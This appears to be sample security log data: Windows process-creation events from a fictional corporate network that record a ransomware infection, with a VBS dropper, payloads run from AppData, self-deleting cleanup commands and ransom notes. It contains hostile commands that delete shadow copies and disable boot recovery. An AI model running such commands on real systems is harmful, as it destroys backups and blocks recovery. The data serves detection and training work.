

1_timeCommandLinehost
22016-08-24T12:27:26.000-0600taskhost.exe C:\Windows\system32\defrag.exe -cwe8105desk
32016-08-24T12:27:24.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
42016-08-24T12:25:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
52016-08-24T12:25:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
62016-08-24T12:21:06.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
72016-08-24T12:17:35.000-0600"C:\Windows\system32\w32tm.exe" /stripchart /computer:we9041srv.waynecorpinc.local /dataonly /samples:1we8105desk
82016-08-24T12:17:33.000-0600"C:\Windows\system32\PING.EXE" we9041srv.waynecorpinc.local /n 2we8105desk
92016-08-24T12:17:33.000-0600"C:\Windows\system32\w32tm.exe" /query /sourcewe8105desk
102016-08-24T12:17:31.000-0600C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES958E.tmp" "c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC958D.tmp"we8105desk
112016-08-24T12:17:31.000-0600"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\l62oeljq.cmdline"we8105desk
122016-08-24T12:17:31.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
132016-08-24T12:17:31.000-0600C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES93AA.tmp" "c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC93A9.tmp"we8105desk
142016-08-24T12:17:31.000-0600"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\m7m1p90n.cmdline"we8105desk
152016-08-24T12:17:31.000-0600C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\BOBSMI~1.WAY\AppData\Local\Temp\RES936C.tmp" "c:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\CSC936B.tmp"we8105desk
162016-08-24T12:17:31.000-0600"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\bob.smith.WAYNECORPINC\AppData\Local\Temp\skj1oiou.cmdline"we8105desk
172016-08-24T12:17:29.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
182016-08-24T12:17:29.000-0600C:\Windows\System32\sdiagnhost.exe -Embeddingwe8105desk
192016-08-24T12:17:29.000-0600C:\Windows\System32\svchost.exe -k swprvwe8105desk
202016-08-24T12:17:29.000-0600"taskhost.exe"we8105desk
212016-08-24T12:17:29.000-0600C:\Windows\system32\vssvc.exewe8105desk
222016-08-24T12:17:29.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
232016-08-24T12:17:29.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe21_ Global\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
242016-08-24T12:17:28.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
252016-08-24T12:17:28.000-0600C:\Windows\system32\mcbuilder.exewe8105desk
262016-08-24T12:17:28.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
272016-08-24T12:17:28.000-0600C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperationswe8105desk
282016-08-24T12:17:28.000-0600C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreationwe8105desk
292016-08-24T12:17:28.000-0600C:\Windows\system32\lpremove.exewe8105desk
302016-08-24T12:16:49.000-0600\??\C:\Windows\system32\conhost.exe 0xffffffffwe1149srv
312016-08-24T12:16:49.000-0600C:\Windows\system32\sc.exe start wuauservwe1149srv
322016-08-24T12:15:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
332016-08-24T12:15:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
342016-08-24T12:10:47.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
352016-08-24T12:10:47.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe20_ Global\UsGthrCtrlFltPipeMssGthrPipe20 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
362016-08-24T12:10:29.000-0600C:\Windows\system32\svchost.exe -k defragsvcwe8105desk
372016-08-24T12:10:28.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
382016-08-24T12:10:28.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
392016-08-24T12:10:28.000-0600"taskhost.exe"we8105desk
402016-08-24T12:10:28.000-0600C:\Windows\system32\defrag.exe -cwe8105desk
412016-08-24T12:10:28.000-0600C:\Windows\system32\aitagent.EXEwe8105desk
422016-08-24T12:10:28.000-0600C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdatewe8105desk
432016-08-24T12:07:08.000-0600taskhost.exe $(Arg0)we8105desk
442016-08-24T12:06:06.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
452016-08-24T12:05:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
462016-08-24T12:05:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
472016-08-24T12:03:00.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
482016-08-24T11:55:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
492016-08-24T11:55:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
502016-08-24T11:51:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
512016-08-24T11:45:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
522016-08-24T11:45:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
532016-08-24T11:39:35.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
542016-08-24T11:39:35.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe19_ Global\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
552016-08-24T11:36:52.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
562016-08-24T11:36:52.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe18_ Global\UsGthrCtrlFltPipeMssGthrPipe18 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
572016-08-24T11:36:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
582016-08-24T11:35:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
592016-08-24T11:35:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
602016-08-24T11:28:43.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
612016-08-24T11:27:21.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
622016-08-24T11:25:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
632016-08-24T11:25:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
642016-08-24T11:21:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
652016-08-24T11:18:10.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
662016-08-24T11:18:10.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe17_ Global\UsGthrCtrlFltPipeMssGthrPipe17 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
672016-08-24T11:15:29.000-0600ping -n 1 127.0.0.1we8105desk
682016-08-24T11:15:29.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
692016-08-24T11:15:29.000-0600taskkill /t /f /im "osk.exe"we8105desk
702016-08-24T11:15:29.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
712016-08-24T11:15:29.000-0600/d /c taskkill /t /f /im "osk.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe" > NULwe8105desk
722016-08-24T11:15:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
732016-08-24T11:15:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
742016-08-24T11:15:13.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}we8105desk
752016-08-24T11:15:12.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-110916_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-110916 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
762016-08-24T11:15:12.000-0600"C:\Windows\System32\WScript.exe" "C:\Users\bob.smith.WAYNECORPINC\Desktop\# DECRYPT MY FILES #.vbs"we8105desk
772016-08-24T11:15:12.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
782016-08-24T11:15:12.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2404 CREDAT:79874we8105desk
792016-08-24T11:15:11.000-0600"C:\Windows\system32\NOTEPAD.EXE" C:\Users\bob.smith.WAYNECORPINC\Desktop\# DECRYPT MY FILES #.txtwe8105desk
802016-08-24T11:15:11.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2404 CREDAT:79873we8105desk
812016-08-24T11:15:11.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohomewe8105desk
822016-08-24T11:14:23.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
832016-08-24T11:14:23.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe15_ Global\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
842016-08-24T11:12:47.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
852016-08-24T11:12:47.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe14_ Global\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
862016-08-24T11:12:15.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
872016-08-24T11:12:06.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
882016-08-24T11:11:54.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
892016-08-24T11:11:54.000-0600"C:\Windows\explorer.exe"we8105desk
902016-08-24T11:11:51.000-0600taskhost.exe $(Arg0)we8105desk
912016-08-24T11:10:01.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
922016-08-24T11:10:01.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe13_ Global\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
932016-08-24T11:08:47.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
942016-08-24T11:08:47.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe12_ Global\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
952016-08-24T11:06:46.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
962016-08-24T11:06:46.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe11_ Global\UsGthrCtrlFltPipeMssGthrPipe11 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
972016-08-24T11:06:39.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
982016-08-24T11:06:31.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
992016-08-24T11:06:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
1002016-08-24T11:06:01.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1012016-08-24T11:05:53.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1022016-08-24T11:05:47.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1032016-08-24T11:05:33.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1042016-08-24T11:05:19.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1052016-08-24T11:05:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
1062016-08-24T11:05:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
1072016-08-24T11:05:03.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1082016-08-24T11:04:55.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1092016-08-24T11:04:53.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1102016-08-24T11:04:33.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1112016-08-24T11:04:33.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1122016-08-24T11:04:31.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
1132016-08-24T11:04:31.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe10_ Global\UsGthrCtrlFltPipeMssGthrPipe10 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
1142016-08-24T11:02:36.000-0600C:\Windows\system32\AUDIODG.EXE 0x4d4we8105desk
1152016-08-24T11:02:36.000-0600rundll32.exe C:\Windows\system32\hotplug.dll,HotPlugEjectVetoed \\.\pipe\PNP_HotPlug_Pipe_1.{339df01b-6d4c-4d9a-b389-98d62839f1b0}we8105desk
1162016-08-24T11:02:29.000-0600C:\Windows\system32\DeviceDisplayObjectProvider.exe -Embeddingwe8105desk
1172016-08-24T11:02:15.000-0600C:\Windows\system32\DeviceDisplayObjectProvider.exe -Embeddingwe8105desk
1182016-08-24T10:56:55.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
1192016-08-24T10:56:55.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11099_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11099 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"we8105desk
1202016-08-24T10:56:54.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:4576 CREDAT:71937we8105desk
1212016-08-24T10:56:51.000-0600"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohomewe8105desk
1222016-08-24T10:56:47.000-0600"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL D:\Work Stuff\013\013366.pdfwe8105desk
1232016-08-24T10:56:46.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1242016-08-24T10:56:43.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1252016-08-24T10:56:29.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1262016-08-24T10:56:19.000-0600"C:\Windows\explorer.exe"we8105desk
1272016-08-24T10:56:11.000-0600C:\Windows\system32\AUDIODG.EXE 0x2c4we8105desk
1282016-08-24T10:56:09.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1292016-08-24T10:56:08.000-0600"C:\Windows\explorer.exe"we8105desk
1302016-08-24T10:55:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
1312016-08-24T10:55:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
1322016-08-24T10:53:39.000-0600C:\Windows\System32\slui.exe -Embeddingwe8105desk
1332016-08-24T10:51:05.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe8105desk
1342016-08-24T10:49:42.000-0600"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532we8105desk
1352016-08-24T10:49:42.000-0600"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"we8105desk
1362016-08-24T10:49:24.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1372016-08-24T10:49:24.000-0600"C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailureswe8105desk
1382016-08-24T10:49:24.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1392016-08-24T10:49:24.000-0600"C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled nowe8105desk
1402016-08-24T10:49:23.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1412016-08-24T10:49:23.000-0600"C:\Windows\system32\wbem\wmic.exe" shadowcopy deletewe8105desk
1422016-08-24T10:49:23.000-0600C:\Windows\System32\svchost.exe -k swprvwe8105desk
1432016-08-24T10:49:23.000-0600C:\Windows\system32\vssvc.exewe8105desk
1442016-08-24T10:49:23.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1452016-08-24T10:49:23.000-0600"C:\Windows\system32\vssadmin.exe" delete shadows /all /quietwe8105desk
1462016-08-24T10:49:22.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}we8105desk
1472016-08-24T10:49:22.000-0600C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}we8105desk
1482016-08-24T10:49:21.000-0600consent.exe 928 274 0000000001CCA4D0we8105desk
1492016-08-24T10:49:11.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"we8105desk
1502016-08-24T10:49:03.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"we8105desk
1512016-08-24T10:49:03.000-0600"C:\Windows\SysWOW64\QqJXZrBKCk72XzRgZs\AdapterTroubleshooter.exe"we8105desk
1522016-08-24T10:49:03.000-0600C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}we8105desk
1532016-08-24T10:49:03.000-0600consent.exe 928 502 00000000031D8160we8105desk
1542016-08-24T10:49:03.000-0600"C:\Windows\SysWOW64\QqJXZrBKCk72XzRgZs\AdapterTroubleshooter.exe"we8105desk
1552016-08-24T10:49:03.000-0600consent.exe 928 274 0000000001CCA4D0we8105desk
1562016-08-24T10:49:03.000-0600consent.exe 928 274 0000000001CCA4D0we8105desk
1572016-08-24T10:49:03.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}we8105desk
1582016-08-24T10:49:03.000-0600C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}we8105desk
1592016-08-24T10:49:02.000-0600consent.exe 928 274 0000000001CCA4D0we8105desk
1602016-08-24T10:49:01.000-0600"C:\Windows\SysWOW64\explorer.exe"we8105desk
1612016-08-24T10:48:50.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"we8105desk
1622016-08-24T10:48:42.000-0600ping -n 1 127.0.0.1we8105desk
1632016-08-24T10:48:41.000-0600taskkill /t /f /im "121214.tmp"we8105desk
1642016-08-24T10:48:41.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1652016-08-24T10:48:41.000-0600/d /c taskkill /t /f /im "121214.tmp" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp" > NULwe8105desk
1662016-08-24T10:48:41.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe"we8105desk
1672016-08-24T10:48:29.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp"we8105desk
1682016-08-24T10:48:21.000-0600"C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp"we8105desk
1692016-08-24T10:48:21.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1702016-08-24T10:48:21.000-0600"C:\Windows\System32\cmd.exe" /C START "" "C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp"we8105desk
1712016-08-24T10:45:17.000-0600C:\Windows\system32\wbem\wmiprvse.exe -Embeddingwe1149srv
1722016-08-24T10:45:15.000-0600C:\Windows\system32\wbem\wmiprvse.exe -secured -Embeddingwe1149srv
1732016-08-24T10:44:21.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1742016-08-24T10:44:08.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1752016-08-24T10:44:07.000-0600C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}we8105desk
1762016-08-24T10:43:54.000-0600C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}we8105desk
1772016-08-24T10:43:54.000-0600"C:\Windows\explorer.exe"we8105desk
1782016-08-24T10:43:27.000-0600C:\Windows\splwow64.exe 8192we8105desk
1792016-08-24T10:43:21.000-0600"C:\Windows\System32\WScript.exe" "C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\20429.vbs"we8105desk
1802016-08-24T10:43:21.000-0600\??\C:\Windows\system32\conhost.exewe8105desk
1812016-08-24T10:43:21.000-0600cmd.exe /V /C set "GSI=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm RWRL" "FuNCtioN GNbiPp(Pt5SZ1)" "EYnt=45" "GNbiPp=AsC(Pt5SZ1)" "Xn1=52 This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. 
Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. This line has been artificially truncated because it was causing Splunk Security Essentials to be flagged by Avast AV. Because we used this in part to look for very long CLI strings... this will be repeated. 
